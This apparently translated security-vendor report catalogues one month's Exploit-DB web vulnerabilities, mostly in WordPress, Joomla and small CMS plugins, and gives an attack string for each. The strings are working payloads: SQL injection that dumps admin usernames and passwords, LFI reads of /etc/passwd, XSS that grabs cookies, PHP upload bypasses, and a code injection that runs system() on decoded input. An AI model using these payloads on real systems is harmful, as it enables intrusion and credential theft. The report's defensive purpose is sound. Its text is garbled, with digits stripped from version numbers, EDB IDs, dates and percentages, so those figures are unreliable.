EDB Analysis Report (05.08) 05.08.0~05.08. Information on the […] published on Exploit-DB (http://exploit-db.com), classified by type.

Summary of analysis (prepared by: Penta Security Systems, Security Evaluation Team)

Analysis of the Exploit-DB entries published in August 05 shows that reports of […] attacks were the most numerous. Most of the analyzed […] attacks were either ones that arise from the structural characteristics of particular web applications or ones that are easy to carry out. However, by the nature of […] itself, a successful attack leads to a second-stage attack, through which critical system information or personal data can be exposed, so it counts as a very high-risk attack. Care must always be taken that basic pages such as login pages and bulletin boards are not exposed to […] attacks through simple queries.

Looking at occurrences by major software, […] had the largest number of […] discovered. Administrators using […] should check their site's plugins, and if the site uses a plugin in which a […] was found, update that plugin to the latest version.

Number of reports by type
Type | Reports
[…] |
Code […] |
File Upload |
LFI | 7
XSS | 6
Total | 8
[Chart: number of reports by type]

Classification by risk
Risk | Reports | Percentage
High | | .68%
Medium | | 76.%
Total | 8 | 00.00%
[Chart: classification by risk]

Status by attack difficulty
Attack difficulty | Reports | Percentage
High | | 7.8%
Medium | | .68%
Low | 6 | 68.%
Total | 8 | 00.00%
[Chart: status by attack difficulty]

Occurrences by major software
Software name | Reports
[…] |
PHPfileNavigator |
PhpWiki |
PHP News Script |
Nuts |
Wolf |
up.time |
CodoForum |
Aruba Mobility Controller |
Total | 8
[Chart: occurrences by major software]

** Details for major software with 5 or more occurrences
EDB No. | Type | Attack difficulty | Attack risk | Name | Software name
77 | | High | High | Video Gallery.7 - admin-ajax.php |
775 | LFI | Low | High | Candidate Application Form Plugin.0 - |
775 | LFI | Low | High | Simple Image Manipulator Plugin.0 - download.php LFI |
775 | LFI | Low | High | Recent Backups Plugin 0.7 - download-file.php LFI |
775 | LFI | Low | High | TF Image Gallery.0 - ajax_load.php LFI |
78 | | Low | Medium | Plugin 5. - forum_functions.php |
78 | | Low | Medium | Plugin 5. - get_album_item.php |
78 | | Low | Medium | Plugin 5. - get_album_item.php |
706 | XSS | Low | Medium | Googmonify Plugin 0.8. - options-general.php XSS |
Detailed entries
Columns: Date | EDB No. | Category | Attack difficulty | Attack risk | Name | Key attack code | Target program | Target environment

7/08/05 | EDB 775 | File Upload | Difficulty: Low | Risk: Medium
  Name: .0. File Upload Filter Bypass Remote PHP Code Execution - /microweber-latest/ File Upload
  Attack code: POST /microweberlatest/plupload?token= &path=media%555clocalhost%555C&path=media%55Clocalhost%55Cuploaded%55C HTTP/.
    User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows
    -----------------------------7dd0008f
    Content-Disposition: form-data; name="fil"; filename="phpinfo.php"
    -----------------------------7dd0008f--
  Target: .0.

7/08/05 | EDB 77 | XSS | Difficulty: Low | Risk: Medium
  Name: .0. - Stored XSS And CSRF Add Admin Exploit - /microweberlatest/api/save_option XSS
  Attack code: POST /microweber-latest/api/save_option HTTP/.
    option_key=website_keywords&option_group=website&option_value="><img src=j onerror=confirm("zsl")>
  Target: .0.

7/08/05 | EDB 776 | | Difficulty: Medium | Risk: Medium
  Name: PHP News Script.0.0 - allgallery.php
  Attack code: /demo/allgallery.php?id=-00%7+union+select+user()%
  Target: PHP News Script / PHP News Script.0.0

/08/05 | EDB 77 | | Difficulty: High | Risk: High
  Name: Video Gallery.7 - admin-ajax.php vulnerability
  Attack code: /wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR([long decimal argument list omitted]) as CHAR)
  Target: Video Gallery.7

0/08/05 | EDB 775 | LFI | Difficulty: Low | Risk: High
  Name: Candidate Application Form Plugin.0 -
  Attack code: /wp-content/plugins/candidate-applicationform/downloadpdffile.php?filename=../../../../../../../../../../etc/passwd
  Target: Candidate Application Form Plugin.0

0/08/05 | EDB 7750 | | Difficulty: High | Risk: High
  Name: - article.php
  Attack code: /wds_news/article.php?id=-+union+select+,group_concat(username,0xa,password),,,5,6,7,8,,0+from+cms_admin--
  Target:

0/08/05 | EDB 775 | LFI | Difficulty: Low | Risk: High
  Name: Simple Image Manipulator Plugin.0 - download.php LFI
  Attack code: /wp-content/plugins/./simple-imagemanipulator/controller/download.php?filepath=/etc/passwd
  Target: Simple Image Manipulator Plugin.0

0/08/05 | EDB 775 | LFI | Difficulty: Low | Risk: High
  Name: Recent Backups Plugin 0.7 - download-file.php LFI
  Attack code: /wp-content/plugins/recent-backups/downloadfile.php?file_link=/etc/passwd
  Target: Recent Backups Plugin 0.7

0/08/05 | EDB 775 | LFI | Difficulty: Low | Risk: High
  Name: TF Image Gallery.0 - ajax_load.php LFI
  Attack code: /wp-content/plugins/wptf-image-gallery/libmbox/ajax_load.php?url=/etc/passwd
  Target: TF Image Gallery.0
/08/05 | EDB 7767 | | Difficulty: High | Risk: High
  Name: Event Manager.. - index.php
  Attack code: POST /joomla../index.php?option=com_jem&view=myevents&Itemid=5 HTTP/.
    filter=&filter_search=&limit=0&cid%5b%5d=,)%0AND%0(SELECT%065%0FROM(SELECT%0COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*))x%0FROM%0INFORMATION_SCHEMA.TABLES%0GROUP%0BY%0x)a)%0AND%0(577=577&filter_order=a.dates&filter_order_dir=&enableemailaddress=0&boxchecked=&task=myevents.unpublish&option=com_jem&5c57c6e06bd6670f7b56ecaf=
  Target: Event Manager..

5/08/05 | EDB 777 | | Difficulty: Medium | Risk: Medium
  Name: com_informations component - index.php
  Attack code: /index.php?option=com_informations&view=sousthemes&themeid=.+union+select+,,version()%
  Target: com_informations component

5/08/05 | EDB 777 | | Difficulty: Medium | Risk: Medium
  Name: com_memorix component - index.php
  Attack code: /index.php?option=com_memorix&task=result&searchplugin=theme&itemid=60&themeid=-85+union+select+,,version(),,555,666,777,888,--+AbuHassan
  Target: com_memorix component

5/08/05 | EDB 776 | LFI | Difficulty: Low | Risk: Medium
  Name: Picasaweb - plugins_player.php LFI
  Attack code: /plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php
  Target: Picasaweb

7/08/05 | EDB 780 | Code […] | Difficulty: Medium | Risk: High
  Name: Nuts CMS Remote […] - login.php Code […]
  Attack code: /login.php?r=<?php+error_reporting(0);print(_nutcmsid_);system(base6_decode(\$_server[http_cmd]));die;+?>
  Target: Nuts / Nuts CMS

8/08/05 | EDB 78 | | Difficulty: Low | Risk: Medium
  Name: Plugin 5. - forum_functions.php
  Attack code: POST /wordpress/wp-content/plugins/wpsymposium/ajax/forum_functions.php HTTP/.
    Cache-Control: no-cache
    action=gettopic&topic_id= AND SLEEP(5)&group_id=0
  Target: Plugin 5.

8/08/05 | EDB 78 | | Difficulty: Medium | Risk: Medium
  Name: CMS.. - /-CMS/site/index.php/admin/pages/view-tree/ vulnerability
  Attack code: /-CMS/site/index.php/admin/pages/view-tree/0' union all select,concat(email, ":", password),,,5,6,7,8,,0 from bigtree_users %/
  Target: CMS..

8/08/05 | EDB 78 | | Difficulty: Low | Risk: Medium
  Name: CMS.. - /-CMS/site/index.php/admin/ajax/pages/get-seo-score
  Attack code: POST /-CMS/site/index.php/admin/ajax/pages/get-seo-score HTTP/.
    content=foo&resources=bar&id=foo' or =%&title=trees of All Sizes
  Target: CMS..

8/08/05 | EDB 780 | | Difficulty: Low | Risk: Medium
  Name: CodoForum.. - index.php
  Attack code: /codoforum/index.php?u=/page/6 and =%/terms-ofservice
  Target: CodoForum / CodoForum..

8/08/05 | EDB 787 | XSS | Difficulty: Medium | Risk: Medium
  Name: PHPfileNavigator.. - navega.php XSS
  Attack code: ../navega.php?PHPSESSID=HELL&dir=
  Target: tor or..

8/08/05 | EDB 787 | XSS | Difficulty: Medium | Risk: Medium
  Name: PHPfileNavigator.. - accion.php XSS
  Attack code: ../accion.php?accion=buscador&PHPSESSID=HELL&dir=
  Target: tor or..

8/08/05 | EDB 787 | XSS | Difficulty: Medium | Risk: Medium
  Name: PHPfileNavigator.. - preferencias.php XSS
  Attack code: ../preferencias.php?PHPSESSID=HELL&dir=
  Target: tor or..

8/08/05 | EDB 78 | | Difficulty: Low | Risk: Medium
  Name: Plugin 5. - get_album_item.php
  Attack code: /wp-content/plugins/wpsymposium/get_album_item.php?size=version%8%%0;%0--
  Target: Plugin 5.

8/08/05 | EDB 78 | | Difficulty: Low | Risk: Medium
  Name: Plugin 5. - get_album_item.php
  Attack code: /wp-content/plugins/wpsymposium/get_album_item.php?size=version%8%%0;%0--
  Target: Plugin 5.

/08/05 | EDB 7886 | XSS | Difficulty: Low | Risk: Medium
  Name: up.time 7.5.0 - main.php XSS
  Attack code: /main.php?section=usercontainer&subsection=edit7bef8%5c%5ftitle%5e%5cscript%5ealert%58%5%5c%5fscript%5ea05&id=6&name=Testingus
  Target: up.time / up.time 7.5.0
0/08/05 | EDB 78 | XSS | Difficulty: Medium | Risk: Medium
  Name: Aruba Mobility Controller 6...8 - switch_mon.html XSS
  Attack code: /screens/switch/switch_mon.html?mode=plogcustom&mode-title=test</td><img width= height= src=/images/logo-mobility-controller.gif onload=alert(document.cookie)>
  Target: Aruba Mobility Controller / Aruba Mobility Controller 6...8

/08/05 | EDB 78 | | Difficulty: Low | Risk: Medium
  Name: .0.8 - webupgrade.php
  Attack code: POST /webupgrade/webupgrade.php HTTP/.
    step=&login='&password='&show_advanced_output=
  Target: .0.8

/08/05 | EDB 77 | | Difficulty: Low | Risk: Medium
  Name: .0. - load_logfiles.php
  Attack code: /remotereporter/load_logfiles.php?server=%0and%0=&url=a
  Target: .0.

/08/05 | EDB 76 | | Difficulty: Low | Risk: Medium
  Name: .6..8 - verification.php
  Attack code: POST /webadmin/auth/verification.php HTTP/.
    login= and =--
  Target: .6..8

/08/05 | EDB 76 | | Difficulty: Low | Risk: Medium
  Name: .6..8 - index.php
  Attack code: POST /webadmin/deny/index.php HTTP/.
    dpid= and =--
  Target: .6..8

/08/05 | EDB 706 | XSS | Difficulty: Low | Risk: Medium
  Name: Googmonify Plugin 0.8. - options-general.php XSS
  Attack code: POST /wp-admin/optionsgeneral.php?page=googmonify.php HTTP/.
    PID="><script>alert(document.cookie)</script>&Limit=0&Analytics=0&aid="><script>alert(/ehsan Hosseini/)</script>&GoogmonifyUpdate=Update Options»
  Target: Googmonify Plugin 0.8.

8/08/05 | EDB 800 | LFI | Difficulty: Low | Risk: High
  Name: CMS.7. - admin.php LFI
  Attack code: POST /pluck/admin.php?action=language HTTP/.
    cont=../../../../../../../etc/passwd&save=save
  Target: CMS.7.

8/08/05 | EDB 800 | File Upload | Difficulty: Low | Risk: Medium
  Name: CMS.7. - admin.php File Upload
  Attack code: POST /pluck/admin.php?action=files HTTP/.
    User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows
    -----------------------------7dd0008f
    Content-Disposition: form-data; name="fil"; filename="phpinfo.php5"
    -----------------------------7dd0008f--
  Target: CMS.7.
8/08/05 | EDB 800 | XSS | Difficulty: Low | Risk: Medium
  Name: CMS.7. - admin.php XSS
  Attack code: POST /pluck/admin.php?action=images HTTP/.
    User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows
    -----------------------------7dd0008f
    Content-Disposition: form-data; name="imagefile"; filename="<img src=# onerror=alert(7)>.png"
    -----------------------------7dd0008f--
  Target: CMS.7.

8/08/05 | EDB 800 | XSS | Difficulty: Low | Risk: Medium
  Name: CMS.7. - admin.php XSS ()
  Attack code: POST /pluck/admin.php?action=language HTTP/.
    title=hello&seo_name=&content=<script>alert(7)</script>&description=&keywords=&hidden=no&sub_page=&theme=default&save=save
  Target: CMS.7.

8/08/05 | EDB 8000 | File Upload | Difficulty: Low | Risk: Medium
  Name: Wolf CMS - /wolfcms/?/admin/plugin/file_manager/browse/ File Upload
  Attack code: POST /wolfcms/?/admin/plugin/file_manager/browse/ HTTP/.
    User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows
    -----------------------------7dd0008f
    Content-Disposition: form-data; name="imagefile"; filename="hello.php"
    -----------------------------7dd0008f--
  Target: Wolf / Wolf CMS

/08/05 | EDB 807 | XSS | Difficulty: Low | Risk: Medium
  Name: PhpWiki.5. - index.php XSS
  Attack code: /phpwiki/index.php?pagename=%c%fscript%e%cscript%ealert%8document.cookie%%c%fscript%E%C!--
  Target: PhpWiki / PhpWiki.5.

/08/05 | EDB 807 | LFI | Difficulty: Low | Risk: Medium
  Name: PhpWiki.5. - index.php LFI
  Attack code: /phpwiki/index.php/phpwikiadministration?action=loadfile&overwrite=&source=/etc/group
  Target: PhpWiki / PhpWiki.5.

/08/05 | EDB 807 | XSS | Difficulty: Low | Risk: Medium
  Name: PhpWiki.5. - index.php XSS ()
  Attack code: POST /phpwiki/index.php/userpreferences HTTP/.
    pagename=userpreferencesabc<script><script>alert�documentcookie&#;<script><&#;&#5;
  Target: PhpWiki / PhpWiki.5.